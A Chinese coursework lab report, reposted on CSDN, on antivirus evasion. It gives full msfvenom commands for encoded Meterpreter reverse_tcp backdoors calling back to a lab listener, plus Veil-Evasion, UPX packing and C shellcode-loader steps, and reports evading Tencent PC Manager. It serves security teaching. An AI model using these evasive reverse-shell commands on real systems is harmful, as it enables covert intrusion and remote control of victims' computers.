20155307《网络对抗》免杀原理与实践

最新推荐文章于 2024-08-16 16:51:12 发布
最新推荐文章于 2024-08-16 16:51:12 发布
阅读量54 收藏
点赞数
文章标签: c/c++ 操作系统 python
原文链接:http://www.cnblogs.com/zhuanyedajiesanshinian/p/8784559.html
版权

老师留的问答题

  • 杀软是如何检测出恶意代码的?

    1.通过行为检测
    2.通过特征码的比对

  • 免杀是做什么?

    使得恶意软件躲避杀毒软件的检查

  • 免杀的基本方法有哪些?

    修改特征码和改变行为特征

实验主要过程

  • 1、免杀效果参考基准。Kali使用上次实验msfvenom产生后门的可执行文件,刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址进行扫描,有48%的杀软报告病毒。

    1074394-20180410225822938-876378219.jpg

  • 2、使用msf编码器 编码一次,Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -b ‘\x00’ LHOST=192.168.1.124 LPORT=5307 -f exe >liuhao.exe

    1074394-20180410225905538-811148725.jpg
    理论上会降低被查出率,但实际上并没有什么变化。网站监测结果还是51%的杀软报告病毒,
    1074394-20180410230056690-387087425.jpg
    显示回连成功
    1074394-20180410230309824-1945755533.png

  • 3、多次编码 Kali输入命令msfvenom -p windows/meterpreter/reverse_tcp -e x86/shikata_ga_nai -i 10 -b ‘\x00’ LHOST=192.168.1.124 LPORT=5307 -f exe > liuhao.exe

    1074394-20180410230343425-1315825811.jpg
    多次编码依旧没有任何作用,被电脑管家查杀,恢复后放入网站检查
    1074394-20180410230441362-1598025338.jpg
    尝试回连,发现录音功能成功
    1074394-20180410230735310-145281571.png

  • 4、使用Veil-Evasion重新编写源代码

    在Kali的终端中启动Veil-Evasion命令行中输入veil,后在veil中输入命令use evasion依次输入如下命令生成你的可执行文件:use python/meterpreter/rev_tcp.py
    1074394-20180410230807604-1501123802.jpg
    放入网站检查
    1074394-20180410231030858-1250293876.jpg
    1074394-20180410231422520-225256034.png

  • 5、UPX加壳尝试 命令upx 5307.exe -o 53071.exe

    1074394-20180410231445786-411314461.jpg
    百分之48的数据说明upx加壳没什么用,
    1074394-20180410231528778-859648335.jpg

  • 6、C语言调用Shellcode 首先,在Kali上使用命令生成一个c语言格式的Shellcode数组。

    1074394-20180410231550732-1799512710.jpg
    VS编译运行产生exe文件
    1074394-20180410232420671-88948824.jpg
    只有百分之十二的杀软报告发现病毒,免杀效果还不错
    1074394-20180410232639758-962433927.png
    按照上次实验用过的msf监听方法在Kali上打开监听,在Win主机开启杀软(Win安装腾讯电脑管家 )的情况下,运行最后生成的优化版exe文件,Kali成功获取了Win主机的权限

转载于:https://www.cnblogs.com/zhuanyedajiesanshinian/p/8784559.html

weixin_30752377
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
源码免杀-花指令
08-21
6. **学习资源**:了解和研究Delphi免杀及花指令技术,可以通过阅读相关书籍、参加网络安全论坛讨论、研究开源项目以及实践编写和分析恶意代码来提升技能。不过,重要的是要在合法的范围内进行,遵循信息安全的道德...
网络免杀进攻学习网络免杀进攻学习网络免杀进攻学习网络免杀进攻学习
08-29
网络免杀进攻学习是网络安全领域中的一个重要分支,主要研究如何在网络攻击中避免被安全系统检测到,从而提高攻击的成功率。这一领域的知识涵盖了多种技术,包括但不限于免杀技术、花指令、汇编语言以及木马免杀策略...
免杀原理实践
cyuyan3hao的博客
04-08 1072
网络对抗技术实验三
20145222《网络对抗免杀原理实践
weixin_33958366的博客
04-01 86
20145222黄亚奇《网络对抗免杀原理实践 知识点: 一、在一个已经感染了恶意代码的机器上如何找到病毒文件? 找到恶意代码才能对其分析,找到恶意代码文件就是就是分析的第一步,一般来讲,恶意代码运行必然会创建一个进程,而这个进程就是我们找到他的突破口,一个打开的进程,可以通过任务管理器、Process Explorer等来找到其映像文件的地址,这样就能找到恶意代码文件了 ...
20145203 盖泽双《网络对抗技术》免杀原理实践
03-26 168
20145203 盖泽双《网络对抗技术》拓展之免杀原理实践 1.基础问题回答 (1)杀软是如何检测出恶意代码的? ①根据病毒的特征码 ②将可执行文件和收集的常见病毒库做对比。 ③观察可执行文件的行为。 (2)免杀是做什么? 采取一些手段使我们的病毒程序注入到靶机时,不被杀毒软件检查出来。可以正常运行以便于我们成功控制靶机。 (3)免杀的基本方法有哪些? 改变特征码 : ①加壳:压缩壳 ...
20145322《网络对抗技术》免杀原理实践
03-26 91
20145322《网络对抗技术》免杀原理实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征码的检测 再就是根据该代码是否有恶意行为来判别,若有恶意的行为,我们就认为该代码是恶意代码。 (2)免杀是做什么? 通过改变恶意程序的明显特征等信息已达到避免被杀毒软件查杀的技术。 (3)免杀的基本方法有哪些? 改变特征码 对恶意代码进行加壳,或用其他语言(如veil-evasion...
20155310《网络对抗免杀原理实践
weixin_30725467的博客
04-11 79
20155310《网络对抗免杀原理实践 基础问题回答 (1)杀软是如何检测出恶意代码的? 基于特征:恶意代码中一般会有一段有较明显特征的代码也就是特征码,如果杀毒软件检测到有程序包含的特征码与其特征码库的代码相匹配,就会把该程序当作恶意软件。 基于行为:通过对恶意代码的观察、研究,有一些行为是恶意代码的共同行为,而且比较特殊。所以当一个程序在运行时,杀毒软件会监视其行为,如果发现了这...
20155324《网络对抗免杀原理实践
weixin_30314793的博客
04-10 75
20155324《网络对抗免杀原理实践 免杀原理 实验内容 (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧; (3)通过组合应用各种技术实现恶意代码免杀 (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1)杀软是如何检测出恶意代码的? 正常行为分析法:正常行为分...
网络对抗技术 20165220 Exp3 免杀原理实践
weixin_30477797的博客
03-31 133
实验任务 1 正确使用msf编码器,msfvenom生成如jar之类的其他文件,veil-evasion,自己利用shellcode编程等免杀工具或技巧; 2 通过组合应用各种技术实现恶意代码免杀(1分)(如果成功实现了免杀的,简单语言描述原理,不要截图。与杀软共生的结果验证要截图。) 3 用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1...
20155305《网络对抗免杀原理实践
weixin_30735391的博客
04-08 64
20155305《网络对抗免杀原理实践 实验主要过程 1、免杀效果参考基准 Kali使用上次实验msfvenom产生后门的可执行文件,刚刚传送到Win主机就被电脑管家查杀了恢复后这次放入老师提供的网址http://www.virscan.org/进行扫描,有48%的杀软报告病毒。 2、使用msf编码器 编码一次 Kali输入命令msfvenom -p windows/meterpret...
20145328 《网络对抗技术》免杀原理实践
weixin_34151004的博客
03-22 90
20145328 《网络对抗技术》免杀原理实践 实践内容: (1)理解免杀技术原理 (2)正确使用msf编码器,veil-evasion,自己利用shellcode编程等免杀工具或技巧 (3)通过组合应用各种技术实现恶意代码免杀 (4)用另一电脑实测,在杀软开启的情况下,可运行并回连成功,注明电脑的杀软名称与版本 基础问题回答 (1)杀软是如何检测出恶意代码的? 杀毒软件对于恶意软件的检测...
研究与免杀过360五引擎.rar
02-15
文件"研究与免杀过360五引擎.exe"可能是演示程序或实验环境,供学习者实践免杀技术,了解免杀原理并尝试应用这些技术。然而,值得注意的是,从事免杀技术的研究必须遵守道德准则,不得用于非法目的,因为这可能会...
快速掌握免杀的方法.实战、动手篇(20节课).rar
05-08
实战、动手篇(20节课)"是一门深度实践型的课程,它将帮助学员系统地学习和掌握各种免杀技术,提高他们在网络安全攻防中的实战水平。通过20节的实战训练,学员将能够熟练运用这些技术,提升恶意软件的隐蔽性和生存...
下载者免杀教程
07-17
虽然本教程主要针对下载者木马,但免杀技术的核心原理可以应用于各种类型的恶意软件。例如,病毒、蠕虫、Rootkit等都可以通过类似的方法来提高生存能力。然而,需要注意的是,这些技术同时也被安全研究人员用于逆向...
C语言 | Leetcode C语言题解之第337题打家劫舍III
m0_59237910的博客
08-15 261
C语言 | Leetcode C语言题解之第337题打家劫舍III
C/C++开发,opencv内置背景减除算法与运动检测
技术需要分享
08-14 1084
C/C++开发,opencv内置背景减除算法的完整代码及编译过程示例
C++】一文掌握C++中的IO流
最新发布
JLX_1的博客
08-16 673
本文详细讲解了C++中的IO流体系,讲解了各种接口的使用方法!
C++ | Leetcode C++题解之第337题打家劫舍III
Ddddddd_158的博客
08-15 281
C++ | Leetcode C++题解之第337题打家劫舍III
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值